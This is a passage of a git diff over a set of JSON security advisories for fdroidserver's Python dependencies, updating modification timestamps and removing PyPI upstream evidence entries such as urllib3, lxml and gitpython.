"published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2020-27783.json b/advisories/BREW-fdroidserver-CVE-2020-27783.json index c8efa53db6..ca9c32ae34 100644 --- a/advisories/BREW-fdroidserver-CVE-2020-27783.json +++ b/advisories/BREW-fdroidserver-CVE-2020-27783.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2020-27783", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-pgww-xf46-h92r", "CVE-2020-27783", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.3", - "key": "pkg:pypi/lxml@6.1.3", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2020-7212.json b/advisories/BREW-fdroidserver-CVE-2020-7212.json index 8bedfa467a..9ad50b3084 100644 --- a/advisories/BREW-fdroidserver-CVE-2020-7212.json +++ b/advisories/BREW-fdroidserver-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2020-7212", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2021-20270.json b/advisories/BREW-fdroidserver-CVE-2021-20270.json index 3af77706c2..2bc9cdcd69 100644 --- a/advisories/BREW-fdroidserver-CVE-2021-20270.json +++ b/advisories/BREW-fdroidserver-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2021-20270", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2021-27291.json b/advisories/BREW-fdroidserver-CVE-2021-27291.json index 7b8ff82c25..51587b5e6c 100644 --- a/advisories/BREW-fdroidserver-CVE-2021-27291.json +++ b/advisories/BREW-fdroidserver-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2021-27291", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2021-28363.json b/advisories/BREW-fdroidserver-CVE-2021-28363.json index c2e48e6d21..4f16c6d09e 100644 --- a/advisories/BREW-fdroidserver-CVE-2021-28363.json +++ b/advisories/BREW-fdroidserver-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2021-28363", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2021-28957.json b/advisories/BREW-fdroidserver-CVE-2021-28957.json index b132afe3ea..fea21c3c2a 100644 --- a/advisories/BREW-fdroidserver-CVE-2021-28957.json +++ b/advisories/BREW-fdroidserver-CVE-2021-28957.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2021-28957", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-jq4v-f5q6-mjqq", "CVE-2021-28957", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.3", - "key": "pkg:pypi/lxml@6.1.3", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2021-33503.json b/advisories/BREW-fdroidserver-CVE-2021-33503.json index 378e29a434..bcac7b28cb 100644 --- a/advisories/BREW-fdroidserver-CVE-2021-33503.json +++ b/advisories/BREW-fdroidserver-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2021-33503", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2021-43818.json b/advisories/BREW-fdroidserver-CVE-2021-43818.json index 865a63f28d..dcf18a742b 100644 --- a/advisories/BREW-fdroidserver-CVE-2021-43818.json +++ b/advisories/BREW-fdroidserver-CVE-2021-43818.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2021-43818", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-55x5-fj6c-h6m8", "CVE-2021-43818", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.3", - "key": "pkg:pypi/lxml@6.1.3", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2022-0338.json b/advisories/BREW-fdroidserver-CVE-2022-0338.json index c544375360..d6590b5fea 100644 --- a/advisories/BREW-fdroidserver-CVE-2022-0338.json +++ b/advisories/BREW-fdroidserver-CVE-2022-0338.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2022-0338", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-39ph-wr67-j4xq", "CVE-2022-0338", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "loguru", - "subject_version": "0.7.3", - "key": "pkg:pypi/loguru@0.7.3", - "resource": "loguru" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2022-21699.json b/advisories/BREW-fdroidserver-CVE-2022-21699.json index f7af0a94bc..132ce288dd 100644 --- a/advisories/BREW-fdroidserver-CVE-2022-21699.json +++ b/advisories/BREW-fdroidserver-CVE-2022-21699.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2022-21699", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-pq7m-3gw7-gq5x", "CVE-2022-21699", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ipython", - "subject_version": "9.17.1", - "key": "pkg:pypi/ipython@9.17.1", - "resource": "ipython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2022-2309.json b/advisories/BREW-fdroidserver-CVE-2022-2309.json index 98b1c42d81..c3c28cd7c6 100644 --- a/advisories/BREW-fdroidserver-CVE-2022-2309.json +++ b/advisories/BREW-fdroidserver-CVE-2022-2309.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2022-2309", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-wrxv-2j5q-m38w", "CVE-2022-2309", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.3", - "key": "pkg:pypi/lxml@6.1.3", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2022-24302.json b/advisories/BREW-fdroidserver-CVE-2022-24302.json index b0613ae8e9..9acf7ec079 100644 --- a/advisories/BREW-fdroidserver-CVE-2022-24302.json +++ b/advisories/BREW-fdroidserver-CVE-2022-24302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2022-24302", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-f8q4-jwww-x3wv", "CVE-2022-24302", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2022-24439.json b/advisories/BREW-fdroidserver-CVE-2022-24439.json index 3b93c8ce92..18ef8cf583 100644 --- a/advisories/BREW-fdroidserver-CVE-2022-24439.json +++ b/advisories/BREW-fdroidserver-CVE-2022-24439.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2022-24439", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-hcpj-qp55-gfph", "CVE-2022-24439", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2022-40023.json b/advisories/BREW-fdroidserver-CVE-2022-40023.json index b9d8bcf76b..6978ad0e59 100644 --- a/advisories/BREW-fdroidserver-CVE-2022-40023.json +++ b/advisories/BREW-fdroidserver-CVE-2022-40023.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2022-40023", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-v973-fxgf-6xhp", "CVE-2022-40023", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mako", - "subject_version": "1.4.1", - "key": "pkg:pypi/mako@1.4.1", - "resource": "mako" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2022-40896.json b/advisories/BREW-fdroidserver-CVE-2022-40896.json index 0c4039687c..3e7ddfaf51 100644 --- a/advisories/BREW-fdroidserver-CVE-2022-40896.json +++ b/advisories/BREW-fdroidserver-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2022-40896", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2023-24816.json b/advisories/BREW-fdroidserver-CVE-2023-24816.json index 85eab9d7ab..a1d2221ab3 100644 --- a/advisories/BREW-fdroidserver-CVE-2023-24816.json +++ b/advisories/BREW-fdroidserver-CVE-2023-24816.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2023-24816", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-29gw-9793-fvw7", "CVE-2023-24816", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ipython", - "subject_version": "9.17.1", - "key": "pkg:pypi/ipython@9.17.1", - "resource": "ipython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2023-32681.json b/advisories/BREW-fdroidserver-CVE-2023-32681.json index 1faffdbd11..3825803be3 100644 --- a/advisories/BREW-fdroidserver-CVE-2023-32681.json +++ b/advisories/BREW-fdroidserver-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2023-32681", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2023-40267.json b/advisories/BREW-fdroidserver-CVE-2023-40267.json index 3b391171c1..0546cab096 100644 --- a/advisories/BREW-fdroidserver-CVE-2023-40267.json +++ b/advisories/BREW-fdroidserver-CVE-2023-40267.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2023-40267", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-pr76-5cm5-w9cj", "CVE-2023-40267", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2023-40590.json b/advisories/BREW-fdroidserver-CVE-2023-40590.json index 8140c0de43..85b3068ff4 100644 --- a/advisories/BREW-fdroidserver-CVE-2023-40590.json +++ b/advisories/BREW-fdroidserver-CVE-2023-40590.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2023-40590", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-wfm5-v35h-vwf4", "CVE-2023-40590", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2023-41040.json b/advisories/BREW-fdroidserver-CVE-2023-41040.json index 5111e6c8aa..28edb4ed86 100644 --- a/advisories/BREW-fdroidserver-CVE-2023-41040.json +++ b/advisories/BREW-fdroidserver-CVE-2023-41040.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2023-41040", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-cwvm-v4w8-q58c", "CVE-2023-41040", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2023-43804.json b/advisories/BREW-fdroidserver-CVE-2023-43804.json index 7a5f1fbd75..1993925fde 100644 --- a/advisories/BREW-fdroidserver-CVE-2023-43804.json +++ b/advisories/BREW-fdroidserver-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2023-43804", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2023-45803.json b/advisories/BREW-fdroidserver-CVE-2023-45803.json index 48bbd18995..64f5c461b7 100644 --- a/advisories/BREW-fdroidserver-CVE-2023-45803.json +++ b/advisories/BREW-fdroidserver-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2023-45803", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2023-48795.json b/advisories/BREW-fdroidserver-CVE-2023-48795.json index be115b4876..3d7f0c14e0 100644 --- a/advisories/BREW-fdroidserver-CVE-2023-48795.json +++ b/advisories/BREW-fdroidserver-CVE-2023-48795.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2023-48795", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-45x7-px36-x8w8", "CVE-2023-48795", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2024-22190.json b/advisories/BREW-fdroidserver-CVE-2024-22190.json index 15491fb053..62dd19146d 100644 --- a/advisories/BREW-fdroidserver-CVE-2024-22190.json +++ b/advisories/BREW-fdroidserver-CVE-2024-22190.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2024-22190", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:11:34Z", "upstream": [ "GHSA-2mqj-m65w-jghx", "CVE-2024-22190", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2024-35195.json b/advisories/BREW-fdroidserver-CVE-2024-35195.json index 5897f7fc17..faa0b7002d 100644 --- a/advisories/BREW-fdroidserver-CVE-2024-35195.json +++ b/advisories/BREW-fdroidserver-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2024-35195", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2024-3651.json b/advisories/BREW-fdroidserver-CVE-2024-3651.json index 9b1093d202..76ebacb732 100644 --- a/advisories/BREW-fdroidserver-CVE-2024-3651.json +++ b/advisories/BREW-fdroidserver-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2024-3651", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2024-37891.json b/advisories/BREW-fdroidserver-CVE-2024-37891.json index f880f5691c..1c3e628693 100644 --- a/advisories/BREW-fdroidserver-CVE-2024-37891.json +++ b/advisories/BREW-fdroidserver-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2024-37891", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2024-47081.json b/advisories/BREW-fdroidserver-CVE-2024-47081.json index 36a9a95b77..ffc55aa1b9 100644 --- a/advisories/BREW-fdroidserver-CVE-2024-47081.json +++ b/advisories/BREW-fdroidserver-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2024-47081", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2025-50181.json b/advisories/BREW-fdroidserver-CVE-2025-50181.json index 1dee6321d7..db893b4c89 100644 --- a/advisories/BREW-fdroidserver-CVE-2025-50181.json +++ b/advisories/BREW-fdroidserver-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2025-50181", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2025-50182.json b/advisories/BREW-fdroidserver-CVE-2025-50182.json index 21fccd3205..69190dd16a 100644 --- a/advisories/BREW-fdroidserver-CVE-2025-50182.json +++ b/advisories/BREW-fdroidserver-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2025-50182", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2025-66418.json b/advisories/BREW-fdroidserver-CVE-2025-66418.json index f37e23f598..cd72e9a674 100644 --- a/advisories/BREW-fdroidserver-CVE-2025-66418.json +++ b/advisories/BREW-fdroidserver-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2025-66418", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2025-66471.json b/advisories/BREW-fdroidserver-CVE-2025-66471.json index 0e2fc536d1..76bb5a84d8 100644 --- a/advisories/BREW-fdroidserver-CVE-2025-66471.json +++ b/advisories/BREW-fdroidserver-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2025-66471", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2025-69277.json b/advisories/BREW-fdroidserver-CVE-2025-69277.json index 767a6ba8b4..d4500ca984 100644 --- a/advisories/BREW-fdroidserver-CVE-2025-69277.json +++ b/advisories/BREW-fdroidserver-CVE-2025-69277.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2025-69277", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-mrfv-m5wm-5w6w", "CVE-2025-69277", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pynacl", - "subject_version": "1.6.2", - "key": "pkg:pypi/pynacl@1.6.2", - "resource": "pynacl" - }, { "strategy": 